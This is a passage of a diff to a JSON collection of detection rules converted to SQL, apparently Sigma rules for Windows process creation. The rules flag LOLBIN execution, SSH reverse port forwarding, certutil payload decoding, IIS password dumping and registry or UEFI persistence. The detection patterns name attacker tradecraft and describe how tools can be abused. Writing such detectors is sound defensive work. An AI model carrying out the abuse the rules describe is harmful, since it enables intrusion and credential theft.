"test", - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", - "author": "frack113", + "description": "Detects LOLBINs executing from an abnormal drive such as a mounted ISO.", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Angelo Violetti - SEC Consult '@angelo_violetti'", "tags": [ - "attack.collection", - "attack.t1119", - "attack.credential_access", - "attack.t1552.001" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Rare false positives could occur on servers with multiple drives." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.docx%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx%' ESCAPE '\\' OR CommandLine LIKE '%.ppt%' ESCAPE '\\' OR CommandLine LIKE '%.pptx%' ESCAPE '\\' OR CommandLine LIKE '%.rtf%' ESCAPE '\\' OR CommandLine LIKE '%.pdf%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\') AND ((CommandLine LIKE '%dir %' ESCAPE '\\' AND CommandLine LIKE '% /b %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\') OR (OriginalFileName = 'FINDSTR.EXE' AND (CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /si %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\') OR OriginalFileName IN ('RUNDLL32.EXE', 'CALC.EXE', 'MSHTA.EXE', 'cscript.exe', 'wscript.exe', 'REGSVR32.EXE', 'installutil.exe', 
'CMSTP.EXE')) AND NOT ((CurrentDirectory LIKE '%C:\\\\%' ESCAPE '\\') OR (CurrentDirectory = '') OR (CurrentDirectory = '')))" ], - "filename": "proc_creation_win_susp_automated_collection.yml" + "filename": "proc_creation_win_lolbin_not_from_c_drive.yml" }, { - "title": "Use of TTDInject.exe", - "id": "b27077d6-23e6-45d2-81a0-e2b356eea5fd", + "title": "Port Forwarding Attempt Via SSH", + "id": "327f48c1-a6db-4eb8-875a-f6981f1b0183", "status": "experimental", - "description": "Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)", - "author": "frack113", + "description": "Detects suspicious SSH tunnel port forwarding to a local port", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1127" + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1572", + "attack.t1021.001", + "attack.t1021.004" ], "falsepositives": [ - "Legitimate use" + "Administrative activity using a remote port forwarding to a local port" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%ttdinject.exe' ESCAPE '\\' OR OriginalFileName = 'TTDInject.EXE'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_ttdinject.yml" + "filename": "proc_creation_win_ssh_port_forward.yml" }, { - "title": "Windows Processes Suspicious Parent Directory", - "id": "96036718-71cc-4027-a538-d1587e0006a7", - "status": "test", - "description": "Detect suspicious parent processes of well-known Windows processes", - "author": "vburov", + "title": "Use Short Name Path in Command Line", + "id": "349d891d-fef0-4fe4-bc53-eee623a15969", + "status": "experimental", + "description": "Detect use of the Windows 8.3 
short name. Which could be used as a method to avoid command-line detection", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1036.003", - "attack.t1036.005" + "attack.t1564.004" ], "falsepositives": [ - "Some security products seem to spawn these" + "Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process." ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lsaiso.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\') AND NOT (((ParentProcessName LIKE '%\\\\SavService.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ngen.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\Windows Defender\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (ParentProcessName = '' OR ParentProcessName = '-')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%~1\\\\%' ESCAPE '\\' OR CommandLine LIKE '%~2\\\\%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Dism.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files\\\\GPSoftware\\\\Directory Opus\\\\dopus.exe' ESCAPE '\\') 
OR (ParentProcessName LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\veam.backup.shell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\winget.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Everything\\\\Everything.exe' ESCAPE '\\') OR ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\' OR (CommandLine LIKE '%\\\\appdata\\\\local\\\\webex\\\\webex64\\\\meetings\\\\wbxreport.exe%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\cmd\\\\scalar.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_proc_wrong_parent.yml" + "filename": "proc_creation_win_susp_ntfs_short_name_path_use_cli.yml" }, { - "title": "Sdclt Child Processes", - "id": "da2738f2-fadb-4394-afa7-0a0674885afa", + "title": "File Decoded From Base64/Hex Via Certutil.EXE", + "id": "cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7", "status": "test", - "description": "A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects the execution of certutil with either the \"decode\" or \"decodehex\" flags to decode base64 or hex encoded files. 
This can be abused by attackers to decode an encoded payload before execution", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\sdclt.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-decode %' ESCAPE '\\' OR CommandLine LIKE '%/decode %' ESCAPE '\\' OR CommandLine LIKE '%-decodehex %' ESCAPE '\\' OR CommandLine LIKE '%/decodehex %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sdclt_child_process.yml" + "filename": "proc_creation_win_certutil_decode.yml" }, { - "title": "Suspicious Download From Direct IP Via Bitsadmin", - "id": "99c840f2-2012-46fd-9141-c761987550ef", + "title": "PUA - Fast Reverse Proxy (FRP) Execution", + "id": "32410e29-5f94-4568-b6a3-d91a8adad863", "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of Fast Reverse Proxy. 
frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", + "author": "frack113, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\frpc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\frps.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\frpc.ini%' ESCAPE '\\' OR (Hashes LIKE '%MD5=7D9C233B8C9E3F0EA290D2B84593C842%' ESCAPE '\\' OR Hashes LIKE '%SHA1=06DDC9280E1F1810677935A2477012960905942F%' ESCAPE '\\' OR Hashes LIKE '%SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C%' ESCAPE '\\') OR md5 = '7d9c233b8c9e3f0ea290d2b84593c842' OR sha1 = '06ddc9280e1f1810677935a2477012960905942f' OR sha256 = '57b0936b8d336d8e981c169466a15a5fd21a7d5a2c7daf62d5e142ee860e387c'))" ], - "filename": "proc_creation_win_bitsadmin_download_direct_ip.yml" + "filename": "proc_creation_win_pua_frp.yml" }, { - "title": "Suspicious Parent Double Extension File Execution", - "id": 
"5e6a80c8-2d45-4633-9ef4-fa2671a39c5c", + "title": "Microsoft IIS Service Account Password Dumped", + "id": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", "status": "experimental", - "description": "Detect execution of suspicious double extension files in ParentCommandLine", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", + "author": "Tim Rauch, Janantha Marasinghe", "tags": [ - "attack.defense_evasion", - "attack.t1036.007" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%.doc.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.docx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.xls.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.xlsx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.ppt.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.pptx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.rtf.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.pdf.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.txt.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.doc.js' ESCAPE '\\' OR ParentProcessName LIKE '%.docx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.xls.js' ESCAPE '\\' OR ParentProcessName LIKE '%.xlsx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.ppt.js' ESCAPE '\\' OR ParentProcessName LIKE '%.pptx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.rtf.js' ESCAPE '\\' OR ParentProcessName LIKE '%.pdf.js' ESCAPE '\\' OR ParentProcessName LIKE '%.txt.js' ESCAPE '\\') OR (ParentCommandLine LIKE '%.doc.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.lnk%' 
ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.doc.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.js%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND CommandLine LIKE '%list %' ESCAPE '\\') AND ((CommandLine LIKE '% /config%' ESCAPE '\\' OR CommandLine LIKE '% /xml%' ESCAPE '\\' OR CommandLine LIKE '% -config%' ESCAPE '\\' OR CommandLine LIKE '% -xml%' ESCAPE '\\') OR ((CommandLine LIKE '% /@t%' ESCAPE '\\' OR CommandLine LIKE '% /text%' ESCAPE '\\' OR CommandLine LIKE '% /show%' ESCAPE '\\' OR CommandLine LIKE '% -@t%' ESCAPE '\\' OR CommandLine LIKE '% -text%' ESCAPE '\\' OR CommandLine LIKE '% -show%' ESCAPE '\\') AND (CommandLine LIKE '%:\\*' ESCAPE '\\' OR CommandLine LIKE '%password%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_double_extension_parent.yml" + "filename": "proc_creation_win_iis_appcmd_service_account_password_dumped.yml" }, { - "title": "Import LDAP Data Interchange Format File Via Ldifde.EXE", - "id": "6f535e01-ca1f-40be-ab8d-45b19c0c8b7f", + "title": "UEFI Persistence Via Wpbbin - ProcessCreation", + "id": "4abc0ec4-db5a-412f-9632-26659cddf145", "status": "experimental", - "description": "Detects the execution of \"Ldifde.exe\" with the import flag \"-i\". 
The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.\n", - "author": "@gott_cyber", + "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", + "attack.persistence", "attack.defense_evasion", - "attack.t1218", - "attack.t1105" + "attack.t1542.001" ], "falsepositives": [ - "Since the content of the files are unknown, false positives are expected" + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR OriginalFileName = 'ldifde.exe') AND (CommandLine LIKE '%-i%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_ldifde_file_load.yml" + "filename": "proc_creation_win_wpbbin_potential_persistence.yml" }, { - "title": "Application Removed Via Wmic.EXE", - "id": "b53317a0-8acf-4fd1-8de8-a5401e776b96", + "title": "Potential Persistence Via Microsoft Compatibility Appraiser", + "id": "f548a603-c9f2-4c89-b511-b089f7e94549", "status": "experimental", - "description": "Uninstall an application with wmic", - "author": "frac113", + "description": "Detects manual execution of the \"Microsoft Compatibility Appraiser\" task via schtasks.\nIn order to trigger persistence stored in the \"\\AppCompatFlags\\TelemetryController\" registry key.\n", + "author": "Sreeman", "tags": [ - "attack.execution", - "attack.t1047" + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": 
"medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%call%' ESCAPE '\\' OR CommandLine LIKE '%uninstall%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%run %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Application Experience\\\\Microsoft Compatibility Appraiser%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_uninstall_application.yml" + "filename": "proc_creation_win_schtasks_persistence_windows_telemetry.yml" }, { - "title": "Set Files as System Files Using Attrib.EXE", - "id": "bb19e94c-59ae-4c15-8c12-c563d23fe52b", - "status": "experimental", - "description": "Detects the execution of \"attrib\" with the \"+s\" flag to mark files as system files", - "author": "frack113", + "title": "Proxy Execution via Wuauclt", + "id": "af77cf95-c469-471c-b6a0-946c685c4798", + "status": "test", + "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team", "tags": [ "attack.defense_evasion", - "attack.t1564.001" + "attack.t1218", + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +s %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE 
'%.dll%' ESCAPE '\\' AND CommandLine LIKE '%RunHandlerComServer%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /UpdateDeploymentProvider UpdateDeploymentProvider.dll %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_attrib_system.yml" + "filename": "proc_creation_win_lolbin_wuauclt.yml" }, { - "title": "Potential Network Sniffing Activity Using Network Tools", - "id": "ba1f7802-adc7-48b4-9ecb-81e227fddfd5", - "status": "test", - "description": "Detects potential network sniffing via use of network tools such as \"tshark\", \"windump\".\nNetwork sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", - "author": "Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Use of UltraVNC Remote Access Software", + "id": "145322e4-0fd3-486b-81ca-9addc75736d8", + "status": "experimental", + "description": "An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.discovery", - "attack.t1040" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate administration activity to troubleshoot network issues" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\tshark.exe' ESCAPE '\\' AND CommandLine LIKE '%-i%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\windump.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'VNCViewer' OR Product = 'UltraVNC VNCViewer' OR Company = 
'UltraVNC' OR OriginalFileName = 'VNCViewer.exe'))" ], - "filename": "proc_creation_win_network_sniffing.yml" + "filename": "proc_creation_win_ultravnc.yml" }, { - "title": "Change Default File Association Via Assoc", - "id": "3d3aa6cd-6272-44d6-8afc-7e88dfef7061", - "status": "test", - "description": "Detects file association changes using the builtin \"assoc\" command.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", - "author": "Timur Zinniatullin, oscd.community", + "title": "Renamed Office Binary Execution", + "id": "0b0cd537-fc77-4e6e-a973-e53495c1083d", + "status": "experimental", + "description": "Detects the execution of a renamed office binary", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.001" + "attack.defense_evasion" ], "falsepositives": [ - "Admin activity" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%assoc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('Excel.exe', 'MSACCESS.EXE', 'OneNote.exe', 'POWERPNT.EXE', 'WinWord.exe') OR Description IN ('Microsoft Access', 'Microsoft Excel', 'Microsoft OneNote', 'Microsoft PowerPoint', 'Microsoft Word')) AND NOT ((NewProcessName LIKE '%\\\\EXCEL.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE 
'\\' OR NewProcessName LIKE '%\\\\POWERPNT.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_assoc_execution.yml" + "filename": "proc_creation_win_renamed_office_processes.yml" }, { - "title": "Fsutil Drive Enumeration", - "id": "63de06b9-a385-40b5-8b32-73f2b9ef84b6", - "status": "experimental", - "description": "Attackers may leverage fsutil to enumerated connected drives.", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "title": "Execution via stordiag.exe", + "id": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", + "status": "test", + "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", + "author": "Austin Songer (@austinsonger)", "tags": [ - "attack.discovery", - "attack.t1120" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Certain software or administrative tasks may trigger false positives." + "Legitimate usage of stordiag.exe." 
], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND CommandLine LIKE '%drives%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\stordiag.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fltmc.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'c:\\\\windows\\\\system32\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'c:\\\\windows\\\\syswow64\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_fsutil_drive_enumeration.yml" + "filename": "proc_creation_win_stordiag_susp_child_process.yml" }, { - "title": "Suspicious New Service Creation", - "id": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", - "status": "experimental", - "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Persistence Attempt Via Run Keys Using Reg.EXE", + "id": "de587dce-915e-4218-aac4-835ca6af6f70", + "status": "test", + "description": "Detects suspicious command line reg.exe tool adding key to RUN key in Registry", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.t1547.001" ], "falsepositives": [ - "Unlikely" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", + "Legitimate administrator sets up autorun keys for legitimate reasons.", + "Discord" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE 
'%create%' ESCAPE '\\' AND CommandLine LIKE '%binPath=%' ESCAPE '\\') OR (CommandLine LIKE '%New-Service%' ESCAPE '\\' AND CommandLine LIKE '%-BinaryPathName%' ESCAPE '\\')) AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\' AND CommandLine LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_service_creation.yml" + "filename": "proc_creation_win_reg_add_run_key.yml" }, { - "title": "Potential COM Objects Download Cradles Usage - Process Creation", - "id": "02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf", - "status": "experimental", - "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", - "author": "frack113", + "title": "Script Interpreter Execution From Suspicious Folder", + "id": "1228c958-e64e-4e71-92ad-7d429f4138ba", + "status": "test", + "description": "Detects a suspicious script executions in temporary folders or folders accessible by environment variables", + "author": 
"Florian Roth (Nextron Systems)", + "tags": [ + "attack.execution", + "attack.t1059" + ], "falsepositives": [ - "Legitimate use of the library" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%[Type]::GetTypeFromCLSID(%' ESCAPE '\\' AND (CommandLine LIKE '%0002DF01-0000-0000-C000-000000000046%' ESCAPE '\\' OR CommandLine LIKE '%F6D90F16-9C73-11D3-B32E-00C04F990BB4%' ESCAPE '\\' OR CommandLine LIKE '%F5078F35-C551-11D3-89B9-0000F81FE221%' ESCAPE '\\' OR CommandLine LIKE '%88d96a0a-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR CommandLine LIKE '%AFBA6B42-5692-48EA-8141-DC517DCF0EF1%' ESCAPE '\\' OR CommandLine LIKE '%AFB40FFD-B609-40A3-9828-F88BBE11E4E3%' ESCAPE '\\' OR CommandLine LIKE '%88d96a0b-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR CommandLine LIKE '%2087c2f4-2cef-4953-a8ab-66779b670495%' 